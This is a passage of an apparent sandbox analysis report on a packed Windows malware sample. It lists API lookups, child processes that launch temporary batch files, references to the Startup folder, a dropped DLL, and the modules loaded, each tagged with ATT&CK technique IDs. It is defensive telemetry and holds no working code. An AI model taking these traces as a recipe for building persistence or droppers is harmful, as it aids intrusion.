(UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005056)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter WinHttpCreateProxyResolver (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventActivityIdControl (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedState (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InternetGetConnectedStateEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter NotifyIpInterfaceChange (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter NotifyUnicastIpAddressChange (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005068)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005392)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005392)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter Process32First (UID: 00000000-00005392)\n \"dllconf.exe\" called \"GetProcAddress\" with a parameter Process32Next (UID: 00000000-00005392)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005268)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005268)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferIdentifyLevel (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferComputeTokenFromLevel (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SaferCloseLevel (UID: 00000000-00005644)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005644)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"130014008e5abc77@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e966a@ADVAPI32.dll\"\n \"0e000f00703f966a@ADVAPI32.dll\"\n \"0e000f00cc3f966a@ADVAPI32.dll\"\n \"11001200b447966a@ADVAPI32.dll\"\n \"110012004848966a@ADVAPI32.dll\"\n \"120013008c48966a@ADVAPI32.dll\"\n \"12001300e448966a@ADVAPI32.dll\"\n \"14001500386e966a@ADVAPI32.dll\"\n \"14001500506e966a@ADVAPI32.dll\"\n \"14001500686e966a@ADVAPI32.dll\"\n \"17001800806e966a@ADVAPI32.dll\"\n \"0d000e00986e966a@ADVAPI32.dll\"\n \"11001200a86e966a@ADVAPI32.dll\"\n \"11001200bc6e966a@ADVAPI32.dll\"\n \"0d000e004466966a@WININET.dll\"\n \"0d000e00b466966a@WININET.dll\"\n \"10001100ec66966a@WININET.dll\"\n \"100011009067966a@WININET.dll\"\n \"10001100006f966a@WININET.dll\"\n \"10001100146f966a@WININET.dll\"\n \"14001500286f966a@WININET.dll\"\n \"14001500406f966a@WININET.dll\"\n \"12001300586f966a@WININET.dll\"\n \"120013006c6f966a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"CreateProcessA\" with parameter \"\\dllconf.exe\" - (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2585.bat\"\" - (UID: 00000000-00005056)\n \"dllconf.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\dllconf.exe\" - (UID: 00000000-00005068)\n \"dllconf.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\r2908.bat\"\" - (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005056)\n \"dllconf.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005068)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00005056-00000C28-1191502355]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005056.00000000.139963.00450000.00000002.mdmp\n 00000000-00005056.00000001.140381.006A5000.00000004.mdmp\n \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005056.00000000.139963.00450000.00000002.mdmp\n 00000000-00005056.00000001.140381.006A5000.00000004.mdmp\n \":\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005056.00000001.140381.006A5000.00000004.mdmp\n \":\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005056.00000001.140381.006A5000.00000004.mdmp\n \":\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005068.00000001.140461.002EB000.00000004.mdmp\n \"C:\\Users\\HAPUBWS\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\users\\hapubws\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005068.00000001.140461.002EB000.00000004.mdmp\n \":\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \":\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005068.00000001.140461.002EB000.00000004.mdmp\n \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00005068.00000001.140461.002EB000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an writable section named \"UPX0\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an writable section named \"UPX1\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an writable section named \"UPX2\"\n \"dllconf.exe\" has an writable section named \"UPX0\"\n \"dllconf.exe\" has an writable section named \"UPX1\"\n \"dllconf.exe\" has an writable section named \"UPX2\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an executable section named \"UPX0\"\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33\" has an executable section named \"UPX1\"\n \"dllconf.exe\" has an executable section named \"UPX0\"\n \"dllconf.exe\" has an executable section named \"UPX1\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "binary-30", "type": 8, "relevance": 3, "name": "Contains ability to read the PEB (Process Environment Block) structure", "description": "\"sample.bin\" can read PEB structure (dword ptr fs:[00000030h]) (Offset: 51403)", "origin": "Binary File", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"SECUR32.DLL\" at base 75850000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"RPCRT4.DLL\" at base 77430000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"SHELL32.DLL\" at base 76330000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"OLE32.DLL\" at base 76150000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"ADVAPI32.DLL\" at base 760a0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"KERNEL32.DLL\" at base 75f20000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"PROFAPI.DLL\" at base 75b40000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6ff70000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75d20000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"WS2_32.DLL\" at base 76fe0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"WINHTTP.DLL\" at base 71d50000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 754f0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 754e0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"WININET.DLL\" at base 77970000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"IPHLPAPI.DLL\" at base 72810000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759d0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a20000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"PROPSYS.DLL\" at base 74790000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"OLEAUT32.DLL\" at base 778d0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"CLBCATQ.DLL\" at base 774e0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74790000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"NTMARTA.DLL\" at base 74f90000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77d80000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"APPHELP.DLL\" at base 759d0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 70820000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76330000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f20000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"SETUPAPI.DLL\" at base 77020000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 771c0000\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 77d70000\n \"dllconf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 721b0000\n \"dllconf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dllconf.exe\" loaded module \"KERNEL32\" at base 75f20000\n \"dllconf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dllconf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a980000\n \"dllconf.exe\" loaded module \"WS2_32.DLL\" at base 76fe0000\n \"dllconf.exe\" loaded module \"WINHTTP.DLL\" at base 71d50000\n \"dllconf.exe\" loaded module \"WININET.DLL\" at base 77970000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 754f0000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 754e0000\n \"dllconf.exe\" loaded module \"IPHLPAPI.DLL\" at base 72810000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 759d0000\n \"dllconf.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a20000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 748d0000\n \"dllconf.exe\" loaded module \"ADVAPI32.DLL\" at base 760a0000\n \"dllconf.exe\" loaded module \"PROPSYS.DLL\" at base 74790000\n \"dllconf.exe\" loaded module \"OLE32.DLL\" at base 76150000\n \"dllconf.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"dllconf.exe\" loaded module \"OLEAUT32.DLL\" at base 778d0000\n \"dllconf.exe\" loaded module \"SHELL32.DLL\" at base 76330000\n \"dllconf.exe\" loaded module \"CLBCATQ.DLL\" at base 774e0000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74790000\n \"dllconf.exe\" loaded module \"NTMARTA.DLL\" at base 74f90000\n \"dllconf.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77d80000\n \"dllconf.exe\" loaded module \"APPHELP.DLL\" at base 759d0000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 70820000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76330000\n \"dllconf.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 75f20000\n \"dllconf.exe\" loaded module \"SETUPAPI.DLL\" at base 77020000\n \"dllconf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 771c0000\n \"dllconf.exe\" loaded module \"SECUR32.DLL\" at base 75850000\n \"dllconf.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 77d70000\n \"dllconf.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6ff70000\n \"dllconf.exe\" loaded module \"KERNEL32.DLL\" at base 75f20000\n \"cmd.exe\" loaded module \"ADVAPI32.DLL\" at base 760a0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter WININET.DLL (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005056)\n \"e7379a48e702c96fa733625cf8535f1a1a9c6704941224a7b5ecb18d8e0fed33.exe\" called 